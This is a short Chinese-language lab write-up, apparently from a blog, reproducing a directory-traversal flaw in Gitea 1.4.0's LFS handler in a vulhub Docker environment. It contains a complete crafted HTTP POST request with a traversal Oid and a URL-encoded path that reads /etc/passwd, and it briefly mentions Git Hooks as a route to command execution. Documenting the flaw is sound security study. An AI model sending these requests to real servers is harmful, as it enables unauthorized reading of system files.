Gitea是从gogs衍生出的一个开源项目GogsvsGitea,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,而命令执行是通过Git Hooks自动执行命令来完成任意命令执行
思路直接盗图漏洞分析nsfocus
也就是我们可以直接创建一个对象,而这个对象是由几个字段共同构成的。像这样
{
"Oid": "---",
"Size": ---,
"User" : "---",
"Password" : "---",
"Repo" : "---",
"Authorization" : "---"
}
而漏洞出现在从lfs下载文件时的modules/lfs/content_store.go:Get()方法,它要从meta.Oid取路径去读取,所以我们可以在Oid处构造目录从而达到目录遍历的效果
漏洞复现docker开启后进入网站
用默认配置直接立即安装,安装成功后注册(这里账号+密码为test+password)
创建一个公开的仓库后重启docker服务
docker-compose restart
重启后构造POST包发送命令
POST /test/test.git/info/lfs/objects HTTP/1.1
Host: vulhub.yster.live:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 153
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "a",
"Password" : "a",
"Repo" : "a",
"Authorization" : "a"
}
这里为什么Oid要有六个点
显示401,200都是执行成功了,直接访问地址然后抓包
vulhub.yster.live:3000/test/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
命令执行的话可能会用到Git Hooks钩子自动执行
Git Hooks的话一开始就有提到,其实就是会自动执行的额外操作(这里就提一下,因为感觉与本文漏洞无关了已经)
参考博客
